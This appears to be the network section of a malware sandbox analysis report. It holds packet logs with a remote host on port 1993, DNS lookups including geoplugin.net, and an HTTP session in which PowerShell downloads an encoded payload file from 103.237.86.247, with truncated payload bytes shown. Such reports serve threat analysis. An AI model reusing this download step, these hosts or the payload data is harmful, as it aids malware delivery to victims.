                Jul 2, 2024 07:50:49.672441006 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.672466040 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.672470093 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.672487020 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.672497988 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.672504902 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.672508955 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.672533989 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.672715902 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.672727108 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.672753096 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.672792912 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.672807932 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.672817945 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.672828913 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.672831059 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.672838926 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.672849894 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.672858000 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.672875881 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.673258066 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.673269033 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.673279047 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.673290014 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.673300028 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.673300028 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.673311949 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.673325062 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.673327923 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.673341036 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.673351049 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.673352003 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.673362970 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.673368931 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.673373938 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.673384905 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.673394918 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.673394918 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.673417091 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.673438072 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.673717976 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.673787117 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.673801899 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.673824072 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.673947096 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.673957109 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.673968077 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.673979044 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.673985004 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.673990011 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.674011946 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.674035072 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.674427032 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.674438000 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.674448967 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.674458981 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.674468994 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.674479961 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.674482107 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.674490929 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.674508095 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.674508095 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.674519062 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.674530029 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.674530983 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.674541950 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.674545050 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.674554110 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.674568892 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.674592972 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.674849987 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.674860954 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.674875021 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.674885988 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.674889088 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.674896955 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.674907923 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.674913883 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.674918890 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.674930096 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.674940109 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.674941063 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.674951077 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.674956083 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.674962997 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.674973011 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.674983978 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.674983978 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.675004005 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.675436974 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.675447941 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.675457001 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.675470114 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.675479889 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.675482035 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.675492048 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.675502062 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.675503016 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.675513983 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.675519943 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.675554037 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.675578117 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.675884008 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.675900936 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.675911903 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.675919056 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.675942898 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.676008940 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.676018953 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.676023960 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.676029921 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.676119089 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.676120043 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.676206112 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.676214933 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.676259041 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.676285982 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.676296949 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.676306963 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.676317930 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.676327944 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.676330090 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.676338911 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.676362038 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.676378012 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.676534891 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.676546097 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.676556110 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.676567078 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.676573992 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.676601887 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.676709890 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.676721096 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.676738977 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.676764011 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.676856995 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.676867008 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.676893950 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.676973104 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.676984072 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.676995039 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.677004099 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.677006960 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.677018881 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.677022934 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.677062035 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.677181959 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.677192926 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.677226067 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.678334951 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.762176037 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.762204885 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.762216091 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.762248039 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.762284994 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.762296915 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.762307882 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.762320042 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.762327909 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.762343884 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.762502909 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.762514114 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.762523890 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.762535095 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.762546062 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.762548923 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.762557030 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.762563944 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.762567997 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.762593031 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.762603045 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.762784004 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.762795925 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.762813091 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.762823105 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.762828112 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.762833118 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.762839079 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.762842894 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.762845039 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.762887955 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.763267994 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.763284922 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.763294935 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.763333082 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.925825119 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.925863981 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.925877094 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.925895929 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.925928116 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.925945997 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.925957918 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.925968885 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.925980091 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.925993919 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.925995111 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.926037073 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.926212072 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.926223993 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.926235914 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.926246881 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.926255941 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.926258087 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.926270962 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:49.926289082 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:49.926317930 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:50.014543056 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:50.014604092 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:52.266324043 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:52.271287918 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:52.271308899 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:52.271325111 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:52.271337986 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:52.271349907 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:52.271379948 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:52.271409035 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:52.271442890 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:52.271455050 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:52.271476984 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:52.271509886 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:52.276125908 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:52.276216984 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:52.276256084 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:52.276268959 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:52.276433945 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:52.276447058 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:52.276460886 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:52.325417995 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:50:52.331155062 CEST199360023103.237.87.161192.168.2.8
                Jul 2, 2024 07:50:52.331456900 CEST600231993192.168.2.8103.237.87.161
                Jul 2, 2024 07:51:12.588604927 CEST199360022103.237.87.161192.168.2.8
                Jul 2, 2024 07:51:12.589848995 CEST600221993192.168.2.8103.237.87.161
                Jul 2, 2024 07:51:12.594578981 CEST199360022103.237.87.161192.168.2.8
                Jul 2, 2024 07:51:42.626055002 CEST199360022103.237.87.161192.168.2.8
                Jul 2, 2024 07:51:42.630089998 CEST600221993192.168.2.8103.237.87.161
                Jul 2, 2024 07:51:42.634886026 CEST199360022103.237.87.161192.168.2.8
                Jul 2, 2024 07:52:12.628135920 CEST199360022103.237.87.161192.168.2.8
                Jul 2, 2024 07:52:12.680663109 CEST600221993192.168.2.8103.237.87.161
                Jul 2, 2024 07:52:14.177793026 CEST600221993192.168.2.8103.237.87.161
                Jul 2, 2024 07:52:14.182694912 CEST199360022103.237.87.161192.168.2.8
                TimestampSource PortDest PortSource IPDest IP
                Jul 2, 2024 07:50:35.925694942 CEST5357240162.159.36.2192.168.2.8
                Jul 2, 2024 07:50:36.422832966 CEST6297653192.168.2.81.1.1.1
                Jul 2, 2024 07:50:36.430563927 CEST53629761.1.1.1192.168.2.8
                Jul 2, 2024 07:50:45.660748005 CEST5087853192.168.2.81.1.1.1
                Jul 2, 2024 07:50:45.672451019 CEST53508781.1.1.1192.168.2.8
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Jul 2, 2024 07:50:36.422832966 CEST192.168.2.81.1.1.10xd707Standard query (0)198.187.3.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                Jul 2, 2024 07:50:45.660748005 CEST192.168.2.81.1.1.10xe045Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Jul 2, 2024 07:50:02.849742889 CEST1.1.1.1192.168.2.80xaa7aNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                Jul 2, 2024 07:50:02.849742889 CEST1.1.1.1192.168.2.80xaa7aNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                Jul 2, 2024 07:50:36.430563927 CEST1.1.1.1192.168.2.80xd707Name error (3)198.187.3.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                Jul 2, 2024 07:50:45.672451019 CEST1.1.1.1192.168.2.80xe045No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                • 103.237.86.247
                • geoplugin.net
                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.849706103.237.86.247807836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                TimestampBytes transferredDirectionData
                Jul 2, 2024 07:50:06.423907042 CEST180OUTGET /Daguerreotypiernes.fla HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                Host: 103.237.86.247
                Connection: Keep-Alive
                Jul 2, 2024 07:50:07.757780075 CEST1236INHTTP/1.1 200 OK
                Content-Type: application/octet-stream
                Last-Modified: Mon, 01 Jul 2024 07:11:00 GMT
                Accept-Ranges: bytes
                ETag: "688d8ad385cbda1:0"
                Server: Microsoft-IIS/8.5
                Date: Tue, 02 Jul 2024 05:50:02 GMT
                Content-Length: 489948
                Data Raw: 63 51 47 62 36 77 49 72 73 37 76 32 2b 52 49 41 36 77 4a 6b 71 58 45 42 6d 77 4e 63 4a 41 54 72 41 72 55 6e 36 77 4a 79 45 72 6b 79 39 59 75 70 36 77 4b 2f 30 4f 73 43 30 46 57 42 77 5a 31 4a 52 55 78 78 41 5a 76 72 41 76 31 6c 67 66 48 50 50 74 48 31 36 77 4a 4d 6f 48 45 42 6d 2b 73 43 56 75 50 72 41 73 6a 32 75 6f 66 79 47 4b 2f 72 41 68 57 43 63 51 47 62 36 77 4a 6a 4c 6e 45 42 6d 7a 48 4b 63 51 47 62 36 77 4c 68 79 59 6b 55 43 33 45 42 6d 2b 73 43 4c 4b 54 52 34 6e 45 42 6d 33 45 42 6d 34 50 42 42 48 45 42 6d 2b 73 43 4d 61 4f 42 2b 63 71 34 64 77 46 38 7a 4f 73 43 41 32 64 78 41 5a 75 4c 52 43 51 45 36 77 4a 4a 73 48 45 42 6d 34 6e 44 36 77 4b 59 4d 58 45 42 6d 34 48 44 5a 6f 4e 55 41 48 45 42 6d 33 45 42 6d 37 6f 2b 34 5a 50 62 63 51 47 62 36 77 4c 6f 71 6f 48 79 44 71 41 44 67 58 45 42 6d 33 45 42 6d 34 48 79 4d 45 47 51 57 75 73 43 4e 38 35 78 41 5a 74 78 41 5a 76 72 41 6a 42 65 36 77 4b 33 56 75 73 43 5a 35 71 4c 44 42 44 72 41 71 67 4d 63 51 47 62 69 51 77 54 36 77 4c 4c 52 75 73 43 32 48 [TRUNCATED]
                Data Ascii: cQGb6wIrs7v2+RIA6wJkqXEBmwNcJATrArUn6wJyErky9Yup6wK/0OsC0FWBwZ1JRUxxAZvrAv1lgfHPPtH16wJMoHEBm+sCVuPrAsj2uofyGK/rAhWCcQGb6wJjLnEBmzHKcQGb6wLhyYkUC3EBm+sCLKTR4nEBm3EBm4PBBHEBm+sCMaOB+cq4dwF8zOsCA2dxAZuLRCQE6wJJsHEBm4nD6wKYMXEBm4HDZoNUAHEBm3EBm7o+4ZPbcQGb6wLoqoHyDqADgXEBm3EBm4HyMEGQWusCN85xAZtxAZvrAjBe6wK3VusCZ5qLDBDrAqgMcQGbiQwT6wLLRusC2H1C6wJZrOsCL4GB+gwhBQB10usCAh5xAZuJXCQM6wKl33EBm4HtAAMAAOsCIoLrAidYi1QkCHEBm+sCHMiLfCQE6wJA4XEBm4nrcQGb6wJE5oHDnAAAAHEBm+sCzjlTcQGbcQGbakBxAZvrArLHievrAgBrcQGbx4MAAQAAAMCNAXEBm+sC0tmBwwABAABxAZtxAZtTcQGb6wIMA4nrcQGb6wL51Ym7BAEAAHEBm3EBm4HDBAEAAHEBm+sCqwpT6wKf8esC9qlq/3EBm3EBm4PCBesCWTHrAu14MfZxAZtxAZsxyXEBm3EBm4sa6wI1lnEBm0FxAZtxAZs5HAp19OsCqV9xAZtG6wIwBOsCb9iAfAr7uHXd6wJM5OsCzmWLRAr8cQGbcQGbKfBxAZtxAZv/0usCsd7rAkbEugwhBQDrAiUp6wK8PzHA6wLjAusC1q+LfCQM6wIOBusCQnCBNAd/OjP7cQGb6wLw1oPABOsCZRDrAp9dOdB14+sCMvBxAZuJ+3EBm3EBm//X6wIUSnEBm//BMHKa/bb4gMXM7blD93rKOcwEgOy8XPy7hviAxcyyoAlWevo5zASATV/ponbMdnzFzAQKzWZymoN8B3SRsgrVXhv0/svjei8ishJiI0BHuH4++zawm9771b
                Jul 2, 2024 07:50:07.757791996 CEST1236INData Raw: 4b 50 63 6a 6f 31 5a 6b 67 65 73 77 66 48 75 30 66 32 66 37 36 5a 4a 44 69 37 64 2f 5a 2f 44 33 46 45 78 72 76 79 51 71 32 58 4d 33 71 57 6a 2b 46 57 66 2f 32 32 6a 6e 30 36 4d 30 59 72 6b 61 6c 36 30 6b 38 78 2b 33 2f 4b 41 66 44 45 75 34 61 4f
                Data Ascii: KPcjo1ZkgeswfHu0f2f76ZJDi7d/Z/D3FExrvyQq2XM3qWj+FWf/22jn06M0Yrkal60k8x+3/KAfDEu4aOfTozh9LvaJ368Qoi/pdG+X86CnAKvgohRLdG+X86RmP767cG++gLM/vzsoYP/s77fzW+WnI/M3L6QjL7f7Out346M51G8GATbS82+/vVur47vs6d/sD9wZa44f9/u06zTawz+3C+v9d9Orx+Gzsz+xdeAyJ20vche
                Jul 2, 2024 07:50:07.757802963 CEST1236INData Raw: 48 70 64 36 56 73 6a 57 77 34 69 62 4e 36 69 65 51 48 4d 72 57 37 39 55 7a 79 76 34 61 6f 34 37 50 51 38 6b 79 6e 74 79 4d 42 4d 48 75 2f 4e 5a 6e 71 31 58 42 6b 54 6f 42 5a 79 61 4a 4f 74 54 59 4d 72 6e 30 6b 4e 38 35 46 58 6b 54 76 74 38 39 51
                Data Ascii: Hpd6VsjWw4ibN6ieQHMrW79Uzyv4ao47PQ8kyntyMBMHu/NZnq1XBkToBZyaJOtTYMrn0kN85FXkTvt89QDK+6teFcF0jn7FoNQvvzaHoCRvLRfzo8f4uQM/shu/Jo/WMKeo52H+cx9lue7orzVjgvNx+KIW4o4qUET8oSR2cgIaPGcTPM3THwnX4ykBl6vrT9/t1ruHamOzP7cDsrL386M/t/OjP7fzoz+386M/t/OjP7fzoz+
                Jul 2, 2024 07:50:07.757909060 CEST1236INData Raw: 44 36 74 33 31 55 61 48 68 51 4e 4e 71 47 59 5a 56 36 73 62 6f 74 4d 72 36 59 6d 4d 32 55 47 5a 55 67 2b 65 2f 62 30 66 37 45 32 55 6b 4c 49 79 63 43 7a 36 55 75 67 38 36 7a 76 4c 71 79 43 70 46 34 66 44 48 2b 79 77 64 45 52 52 6d 79 43 70 4b 39
                Data Ascii: D6t31UaHhQNNqGYZV6sbotMr6YmM2UGZUg+e/b0f7E2UkLIycCz6Uug86zvLqyCpF4fDH+ywdERRmyCpK9nKv+y/nIZgNjZ/baOvPiv8WKaB1w4xdD7iIK/76SYWatVOZubRagUPzg2p3Lm4iM3PzKVqPcqATwd6PWSNuPAt+jGb/5ovR3L0HH7CSacDslhX86M/t/OjP7fzoz+386M/t/OjP7fzoz+3/BgJIRW9vntj4zqMSwk
                Jul 2, 2024 07:50:07.757920027 CEST896INData Raw: 67 79 48 32 37 34 78 55 32 35 45 62 2b 4f 30 4d 52 47 75 74 70 36 32 71 43 75 4d 50 76 58 61 4d 4b 6d 5a 57 44 30 66 67 32 4f 2b 33 38 36 4d 2f 74 2f 4f 6a 50 37 66 7a 6f 7a 2b 33 38 36 4d 2f 74 2f 4f 6a 50 37 66 7a 6f 7a 2b 35 51 77 68 48 53 58
                Data Ascii: gyH274xU25Eb+O0MRGutp62qCuMPvXaMKmZWD0fg2O+386M/t/OjP7fzoz+386M/t/OjP7fzoz+5QwhHSX7zKGhoWX+ZDjfi09hsG3U7Gu1306M/S4A637fzoz+386M/t/OjP7fzoz+386M/t/OjP7gDuKUGLOV0fwaovANF6Vzgg4vMVSfvqOjg+YzwqduuNPCeJkBxi3UMwBtcnC0KumqrM/jHias7//T5UR/LsgKk8LfPZSn
